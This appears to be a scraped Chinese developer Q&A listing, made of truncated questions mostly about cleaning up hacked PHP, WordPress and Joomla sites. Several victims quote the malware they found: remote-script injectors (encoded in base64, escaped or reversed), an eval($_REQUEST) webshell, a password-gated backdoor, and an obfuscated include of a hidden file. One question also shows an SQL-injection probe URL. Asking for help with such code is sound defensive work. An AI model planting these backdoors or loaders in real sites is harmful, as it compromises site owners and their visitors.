我在清理我被黑客入侵的WordPress网站时,在index.php中发现了不寻常的代码。
这是用来黑我网站的代码吗?或者它来自一个插件?
浏览 19提问于2021-05-16得票数 0
3回答
我已经运行了超过5年的游戏网站,我目前正在从头开始重新设计。我现在的网站使用丑陋的urls (?gameid=123),我想美化它(games/123)。问题是我的网站是由谷歌索引的,我不想破坏旧的urls,我不知道怎么做。
同时,如果我能够更新在Google上出现的urls,而不破坏我在结果中的位置,那就太好了。因此,目前,如果我查到“兔子入侵GPStudios”,最重要的结果是我的网站: www.gpstudios.com/playgame.php?gameid=29,如果我可以将其更新为www.gpstudios.com/games/29或www.gpstudios.com/games/
浏览 1提问于2014-12-22得票数 2
回答已采纳
最近,我在FTP中更改了Wordpress中的config.php文件,因为URL是错误的(我是用define('WP_SITEURL', 'http://www.myyyysite.com'); define('WP_HOME', 'http://www.myyyysite.com');做的)。
现在我仍然不能登录Www.myyysite.com/wp-admin.php,但是Www.myyysite.com/wp-login.php可以工作。是否存在只适用于wp-login.php而不是wp-admin.php的问题?我只是很
浏览 0提问于2021-04-14得票数 0
1回答
我有一个网站,用户可以创建一个帐户,密码是使用SHA256和存储在数据库中的所有信息。
我有一个用unity3d制作的游戏,玩家必须登录。
我使用WWW类从我的网站的登录页面获取信息(当然,不能直接访问数据库)。但我必须把用户名和密码作为帖子值.
现在我有两个问题:
我读到我应该使用php密码库而不是SHA256,这真的很关键吗?
如何在不损害安全性的情况下登录游戏?
浏览 4提问于2015-04-09得票数 1
回答已采纳
我有专门的centos服务器,我的一个网站被黑了。
所以请大家帮忙解决这个安全问题。
如果有人在我的服务器上更新或创建php文件长达24小时,我需要收到电子邮件警报。
除了cron作业代码之外,还有任何perl脚本来完成此工作吗?
谢谢你提前。
浏览 5提问于2013-03-04得票数 0
我的wordpress网站显示致命错误,我如何修复它?
致命错误:命名空间声明语句必须是/home/truevisio/public_html/wp-includes/sodium_compat/lib/sodium_compat.php中第2行的脚本中的第一个语句或任何declare调用之后
浏览 40提问于2020-05-17得票数 0
所以,我在Wordpress上有一个管理员用户,我可以登录,我可以发布,更新,安装插件,等等。但是当我试图在wordpress正在使用的数据库(在wp-config文件中)上查找我的用户名或电子邮件时,我无法找到它。我的用户并不是我在数据库中唯一找不到的用户。 现在,我发现了这一点,因为我们的wordpress网站不久前被黑客入侵了,我正在浏览这些文件,我在index.php或其他文件的顶部看到了一些随机代码。 我清理并删除了这些代码和文件!( aindex.php,ajax-index.php。等)在半夜的某个时候,一些文件正在创建这个文件,并再次插入这个随机代码。所以我每天早上都要这样做
浏览 25提问于2020-08-27得票数 0
每次我打开我的网站,它会自动将我重定向到另一个网站"www.oxxtm.com“。
我发现在index.php和load.php中插入了一段代码
<?php echo base64_decode("PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cDovLzQ1LjM0LjEwMy42OS9pbWFnZXMvd3AtbG9nby5qcyI+PC9zY3JpcHQ+");
?>
我一直在擦掉它,但它总是回来。
到目前为止,这些都是我做的事情。管理wp- -Changed密码-installed防恶意软件插
浏览 1提问于2016-01-21得票数 0
1回答
我的朋友们的网站被黑了,黑客用SQLMAP从http://example.com/users/users.php?id=3泄露所有的数据库数据
浏览 0提问于2016-08-02得票数 -3
让我说我雇了一个“道德黑客和渗透测试”的人。他将试图破坏我的系统/网站的安全。
让我们说,那么被雇佣的人在入侵系统中是不成功的。
显然,我不是安全专家,所以我如何判断:
我的系统很安全!“安全专家”不能入侵它!
“安全专家”不足以入侵它..。
浏览 0提问于2016-12-17得票数 1
3回答
这个网站怎么会被感染呢?
、、、
我运行一个小网站的一些Joomla 1.5版本。今天看来,它遭到了黑客攻击:index.php和index2.php文件被覆盖,管理员帐户的密码被更改,images文件夹可能包含恶意的可执行文件。
我能够用备份恢复index页面,并用另一个特权用户帐户重置管理用户。
由于我在这些问题上不是很多专家,我的问题是:这个网站怎么会被感染?例如:如何实际删除和替换某些文件,并将可执行文件存储在文件夹中。怎么会有人更改管理员密码,但其他人却不动呢?
(我非常清楚安装核心版本更新的重要性-我更感兴趣的是如何执行这样的攻击。)
谢谢你有洞察力的回答。
浏览 0提问于2010-12-09得票数 1
回答已采纳
3回答
我想知道如何在php的输入中识别特定的术语或单词。例如,如果他们编写<script>,它将不被允许提交。这样人们就不会黑进我的网站。
因此,我需要编写代码来查看输入中是否写入了该术语或单词。我的意思是,如果输入是jkgdknf <script> iofosef,我希望程序不允许该人提交该输入。
谢谢!
浏览 1提问于2012-09-10得票数 0
回答已采纳
我有一个joomla站点在运行,但最近我注意到页面顶部有一个脚本标记,看起来像垃圾邮件。
<script type="text/javascript" src="http://lhljoi.ru/tmp/go2.php?site=13"></script>
这个标记甚至在doctype元素之前。
我不能分享网站的网址,因为老板不允许。
请帮帮忙。
谢谢!
浏览 2提问于2012-05-27得票数 1
回答已采纳
目前,每当我在WordPress网站上工作时,我都会有下面的代码自动添加到functions.php文件的顶部,这在我的笔记本电脑上是本地发生的。
请指教,以下是脚本:
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '803ee29202dba58355290373a7e208fa'))
{
$div_code_n
浏览 44提问于2018-07-08得票数 0
回答已采纳
3回答
确保网站的安全
、、
我目前正在调查一个网站,该网站已被黑客攻击,目的是钓鱼。显然,引入了一个PHP文件,并用于上传文件和可能更改目录权限。我怀疑这是通过公共可写目录或不安全的图像上传脚本完成的。
我可以采取哪些步骤来使站点尽可能安全?
浏览 0提问于2011-03-14得票数 1
我是一个自学的wordpress网站设计师,所以请原谅我可能的无知。
我为一个客户工作过的几个网站最近被一个印度尼西亚黑客集团玷污了(有趣!)客户端没有更新wordpress安装和其他一些危及安全的内容。
不幸的是,这些网站没有干净的备份。
网络主机给了我一个文本文件和恶意软件扫描的结果。看起来,很多受影响的文件都是站点的nav-menu.php文件。
显示在文本文件中的扫描结果的一个例子是:"主目录/网站文件夹名称/wp-includes/nav-menu.php: SL-PHP-Injector-1-ejw.unfiicIAL找到“
我知道删除受影响的文件可以解决问题,使帐户恢复并
浏览 0提问于2017-11-02得票数 0
回答已采纳
我正在开发的一个网站的顶部有一些文字,上面写着...Thông tin Tièu düng ng-Ti düng thóng minh fashionshop
它指向这个网站..。
http://diendannguoitieudung.com/
我正在做一个以罗莎为主题的wordpress网站。
我似乎找不到删除页面顶部文字的方法了吗?如有任何帮助,我将不胜感激。
浏览 2提问于2015-11-25得票数 0
1回答
隐若逃不掉
、、
几天前开始帮助一家公司建立网站..。我注意到服务器上的一些html和php文件中有一些奇怪的代码:
<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%6E%69%65%73%73%2E%63%6F%6D%2F%3F%32%38%34%36%31%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%
浏览 0提问于2010-07-23得票数 0
1回答
救命,我迷路了:(我的网站被黑客入侵了,我正在调查这个问题(参见下面的代码)
RewriteEngine On
RewriteRule ^[a-zA-Z0-9_-]+/([0-9]{1,7})([a-zA-Z0-9]{4})[a-zA-Z0-9_-]+/$ index.php?smsite=$2&smid=$1 [L]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /ind
浏览 12提问于2019-08-21得票数 0
我帮助维护一个教堂的网站,我们刚刚注意到我们的谷歌结果不知何故被恶搞了。结果和链接指向教会的网站,但文本描述都是错误的。我已经检查了网站的实际代码(头部在下面复制),没有任何问题。我们的服务器上没有奇怪的文件,网站本身也没有任何问题。
我的问题是,这是怎么可能的,有什么方法可以纠正它吗?
<?php
/**
* The Header for our theme.
*
* Displays all of the <head> section and everything up till <div id="main">
*
* @p
浏览 10提问于2012-10-25得票数 1
回答已采纳
4回答
嗨,我是一个初学者,我希望在PHP中开发一个有成员登录的网站。我想知道如何确保用户名和密码不会被黑客入侵。我的意思是,我应该采取什么措施来防止这种情况。我听过人们谈论MD5和SHA,但我真的不知道如何实现它们。我使用mysql作为后端。
非常感谢。我非常感谢你所做的一切努力
浏览 0提问于2011-05-30得票数 0
回答已采纳
给我这个问题的解决方案。我想创建一个网站:编写和运行您的php代码在线像这个网站: (有一个文本区,按钮运行和输出区)。请帮帮我(我真的不知道从哪里开始),因为我是新手
.output {
background: #eee;
min-height:40px;
}
textarea {
width: 100%;
}
<textarea name="txtCode" rows="10"></textarea>
<br/>
<input type="submit" value=
浏览 1提问于2016-07-29得票数 0
我有一个目录与PHP文件,我不希望匿名用户查看或机器人索引。然而,我确实希望匿名HTTP POST请求-响应PHP文件的工作(即从各种网站上的其他PHP表单)。
会是这样吗?
<Limit POST GET>
allow from all
</Limit>
<files "*.php">
deny from all
</files>
我的PHP脚本处理发布的数据,然后执行到另一个web服务的POST。.htaccess是否会阻止来自受保护的PHP脚本的响应后通信?
浏览 0提问于2012-07-21得票数 0
回答已采纳
我的drupal站点在托管了3个月后给了我这个错误...这是错误..
Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/hotsign1/public_html/posephotography.co.uk/index.php:1) in /home/hotsign1/public_html/posephotography.co.uk/includes/bootstrap.i
浏览 0提问于2012-02-21得票数 0
有没有办法从一个使用纯前端javascript而不是node.js的网站自动发送电子邮件?邮件枪,邮件钻和Sendgrid都只使用node.js或php?有没有可能在没有服务器端代码的情况下做到这一点?我需要这样做的原因是,我不知道如何将node.js添加到现有的网站项目中,而且,node.js非常令人困惑。有什么建议吗?
浏览 2提问于2016-02-04得票数 1
2回答
有时,我所有网站的网址都会重定向到垃圾网址。我猜javascript文件可以做到这一点。
我不知道哪里可以找到,什么解决方案可能是最好的,或者至少阻止这些重定向
谢谢
浏览 3提问于2018-07-10得票数 0
2回答
从4天前到现在,我的网站上自动生成了一些代码,该网站使用wordpress作为CMS进行操作。 在index.php文件中生成的代码如下: /*12a36*/
@include "\057home\057ippl\145ir/p\165blic\137html\057blog\057wp-i\156clud\145s/ce\162tifi\143ates\057.3b4\141428f\056ico";
/*12a36*/ wp-config文件内部生成的代码为: /*e2db6*/
@include "\057h\157m\145/\151p\160l\145
浏览 15提问于2019-06-23得票数 1
1回答
我的网站被黑了。我正在观察黑客如何访问我的网站。虽然我一直在使用bindparam来阻止sql injection和direct access restriction为backdoor attack提供服务,但黑客改变了自己的index.php页面并运行了自己的脚本。S/他在上传的html脚本中添加了下面一行<iframe width='1' height='1' src='https://www.youtube.com/embed/hKdyS_bgUbM?rel=0&autoplay=1&loop=1&playlist=R
浏览 0提问于2018-07-14得票数 1
我已经创建了我的自定义Wordpress+Woocommerce主题,我希望将其显示在github页面上作为参考。
主题不包含任何登录数据。当然,它包含服务器端php代码,显示客户端页面是如何创建的。我总是试图根据其他主题/根据Woocommerce插件内部代码的工作方式来构建逻辑。
当主题源公开时,网站是否存在安全威胁?
浏览 0提问于2021-12-15得票数 0
是否有一个普遍接受的模式(或类库等)用于限制PHP MVC应用程序的某些表单提交?我特别考虑这样一种场景:有人正在对您的一个登录表单运行字典攻击,而您希望在Y秒内X个请求之后阻止它们,或者如果检测到某种请求模式。
具体问题:
有没有框架内置了这个功能?如果不是,那么在基于web的PHP MVC架构中实现这一点的常用方法是什么?
这是应该在应用层处理的事情,还是应该由web服务器自己来处理这种违规行为?
我可以想出许多方法来实现它,但它似乎是所有应用程序都应该拥有的东西,因此应该已经有了一个通用的解决方案。
浏览 0提问于2010-08-11得票数 4
我的wordpress上的wp-admin页面给出了这个错误。我得到了一个空白屏幕,所以我打开了调试。
Warning: Cannot modify header information - headers already sent by
(output started at/home/content/n3pnexwpnas01_data01/71/3047171/html/wp-config.php:1) in
/home/content/n3pnexwpnas01_data01/71/3047171/html/wp-
includes/pluggable.php on line 12
浏览 3提问于2018-06-15得票数 0
我正在做一个网站,在那里人们可以搜索音乐(从YouTube),并在同一网站上观看。(不需要访问YouTube。)在我的数据库中,我有一个播放列表的表。该表有4个值。ID,userID,艺术家和歌曲。
id是唯一的ID -我使用YouTube id来表示-。userID是用户的id。如果他们已登录,则无法使用播放列表功能。我已经有这方面的数据库了。
我有以下PHP代码,这些信息必须保存在数据库中,但它不起作用。
if (isset($_SESSION['username'])){
echo '<button type
浏览 0提问于2012-12-17得票数 0
回答已采纳
2回答
试图访问以下页面的人
//mysqladmin//script/setup.php
是黑客的企图还是..。?
如果是的话,我怎样才能阻止它的ip访问我的网站?
通过htaccess还是别的什么?
浏览 1提问于2010-07-16得票数 12
回答已采纳
2回答
我有一个客户,他的Joomla网站被黑客入侵,我不太清楚这是怎么发生的,但我可以看到,有许多脚本发送垃圾邮件,在搜索包含单词eval的文件时(我发现了61个匹配的文件,如下所示:
<?php
$lbdw = "495c05e857e328e1e65ca6b0bc03dc88";
if (isset($_REQUEST['tlhqdsj'])) {
$mglvq = $_REQUEST['tlhqdsj'];
eval($mglvq);
exit();
}
if (isset($_REQUEST['o
浏览 1提问于2013-10-31得票数 1
回答已采纳
1回答
我有一个网站的一个公司,我需要支持。那些支持那个网站的人给了我所有的档案和数据库,把它移到我的主机上。我把它搬走了直到今天一切都很好。我发现了一个问题-电子邮件表格不起作用。我想我需要更改邮件服务器设置,但我做不到,因为这个设置的文件是由ionCube编码的。我已经在我的主机上安装了它,但是在我的本地计算机上我不能编辑这个文件。在服务器端通过php解码后,有什么方法显示这个php文件吗?
浏览 0提问于2013-11-26得票数 0
回答已采纳
1回答
我使用MAC操作系统,我经常连接到我的iPhone,我使用Gmail,我的大学电子邮件服务,我的大学个人空间,以及许多其他需要登录的网站。
我知道我被黑了,有人可以完全控制我的电脑,不是用GUI的方式,但是那个人可以删除文件和创建文件。如果他/她能接触到其他我真的不能说的东西。
我的解决办法是更换我的电脑,买一台新的,我不会尝试在我的新电脑和旧电脑之间进行任何信息交换。但我仍然需要使用我的大学帐户,电子邮件,Gmail和我在网站上的帐户,我仍然需要使用我的iPhone。
这是否足以保证针对特定人员的网络安全?或者我需要换我的手机,电子邮件和所有东西?
这是我从黑客那里收到的截图。
📷
浏览 0提问于2018-11-03得票数 1
回答已采纳
1回答
假设我有一个网站,其登录页面在localhost:4321上运行。我用python编写了一个暴力破解脚本,当我运行它时,我会尝试暴力破解用户名和密码。问题是我如何使用iptables规则来防止这种暴力攻击?我想为我的localhost:4321网站阻止此脚本。这也很好,如果我可以在一次失败的登录后阻止它几秒钟。
我试图在我的代码中防止这种情况,但我希望通过iptables规则来了解这一点,谢谢。
浏览 3提问于2020-06-18得票数 0
我的网站所有的html和js文件都受到一些脚本的影响。
下面的脚本包含在所有html文件中。
<!--937592--><script type="text/javascript" src="http://jamesdeocariza.com/cnt.php?id=5653691"></script><!--/937592-->
以及所有js文件中的以下脚本。
/*ec8243*/
document.write('<script type="text/javascript" src=&
浏览 0提问于2014-04-04得票数 0
2回答
最近我的Joomla网站不能正常显示,只有背景图片在加载,还有一些次要的东西。
以某种方式更改了页面模板(index.php),并添加了一些额外的代码。具体地说,这段代码:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1Y
浏览 1提问于2013-07-12得票数 0
3回答
我不断地得到这个错误- 500内部服务器错误在我的Joomla1.5网站上。
找到解决方案1-我的文件夹权限为755,文件为644 (甚至与755有相同的错误)。>>>Not工作:(
找到解决方案2-..htaccess相关错误.>>>There根本就不是.htaccess,过去两年仍然运行良好。
错误日志上写着(文件在我的网站上)- "PHP致命错误:扩展“”“不能在第0行的未知位置加载两次”。
Cpanel root中的错误日志说-“权限被拒绝:客户端IP:端口AH00529: /home/mysite/public_html/administr
浏览 3提问于2015-07-17得票数 0
回答已采纳
1回答
我有一个反应-拉拉的网站。
谷歌一直在缓存一些不应该放在第一位的随机页面。而且,它们看起来像其他人的eCommerce页面。
检查这个缓存的页面链接http://webcache.googleusercontent.com/search?q=cache:1tS6wPyBv0AJ:amitkk.com/it+&cd=53&hl=en&ct=clnk&gl=in
此外,您还可以在https://www.google.com/search?q=site%3Aamitkk.com&rlz=1C1SQJL_enIN819IN819&oq=site&
浏览 0提问于2020-04-05得票数 1
嘿,很棒的程序员!
很高兴见到你们大家:)
这是我的网站。我用的是cpanel。
这种类型的问题已经被问到了,但我的有点不同。
每当任何人试图在我的网站上注册或试图发布免费广告时,都会出现以下错误消息:
Swift_Transport Exception
Failed to authenticate on SMTP server with username "info@newdelhifreeads.com" using 2 possible authenticators
/home/newdelhi/public_html/protected/modules/Core/e
浏览 1提问于2013-06-29得票数 0
我最近在我的网站上发现了以下代码
<script type=""text/javascript"">
document.write('>tpircs/<>""YWVPsGmx=i?php.war/moc.nibetsap//:ptth""=crs tpircs<'.split("""").reverse().join(""""))
</script>
这个代码是做什么的?我是XSS的受害者吗?有什么我的托
浏览 1提问于2015-12-04得票数 2
回答已采纳
在我的根index.php文件中,我已经看到这种情况发生了两次。我添加了这个东西
<html><body><script type='text/javascript'>str="<vdepognbt src=" + unescape('%68%74%74%70%3a%2f%2f%37%39%2e%31%33%35%2e%31%35%32%2e%31%38%31%2f%73%74%61%74%73%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%31') + " Oaoz5=
浏览 1提问于2010-06-07得票数 0
回答已采纳
4回答
网站链接注入
、、、、
我有一个网站,是相当静态的。它上面有一些表单,用来发送联系信息,邮件列表提交等。也许在上传到网站几个小时/几天后,我发现主索引页面中有新的代码,我没有放在那里,在一个看不见的div中包含了一堆隐藏的链接。
我有下面的代码来处理从表单中发送的变量。
<?php
// PHP Mail Order to email@email.com w/ some error detection.
$jamemail = "email@email.com";
function check_input($data, $problem='')
浏览 0提问于2010-01-30得票数 2
1回答
我有一个附属网站。我正在监控用户正在访问的网站。我第一次注意到一个用户正在访问我网站中的url,我猜这是某种黑客的企图。我需要帮助。我的网站经常表现不佳。有时它打开的时间比正常时间长。有时表格显示为空。有时Cron作业无法执行。
以下是用户重复访问的几个URL:
http://www.example.com/product.php?category=study-materials&id=SHOEMHMZH8HPAX4H%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,10
浏览 1提问于2018-04-02得票数 1
我管理的一个Drupal站点开始在其中一个目录上显示标准的Google恶意软件警告。
我在页面源代码中看到了可疑代码,需要能够将其删除。
由于不熟悉Drupal,我无法确定在哪里可以找到目录和代码所在的页面。
我使用Google网站管理员工具来确定恶意代码片段。我只想把它去掉,但不知道从哪里来的。
非常感谢Drupal专家的建议。
浏览 0提问于2014-01-09得票数 0
当我们将URL指向时,我们会得到以下错误:
解析错误:语法错误,第18行的/home/iffortc/public_html/ T_STRING /index.php中有意外的博客
浏览 1提问于2009-11-05得票数 0
我谷歌webgraphviz.com和前两个结果是:
📷
第一个重定向到一个药房网站,如何与第二个网站拥有相同的域名?我甚至怀疑这是一种伪造域,攻击者在其中使用类似的字符(例如,大写希腊语α)和A(大写英语a),但通过复制域并将其粘贴到非ASCII检查器 (我发现它只包含ASCII字符)来检查假字符。这怎么可能?
浏览 0提问于2021-06-07得票数 0
回答已采纳
我正在用PHP编写一个代码来访问存储在服务器上的数据库。在PHP中将登录凭据保持在纯文本中是安全的,还是应该应用加密?
浏览 1提问于2015-12-14得票数 0
回答已采纳
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
腾讯会议
实时音视频活动推荐
腾讯云开发者
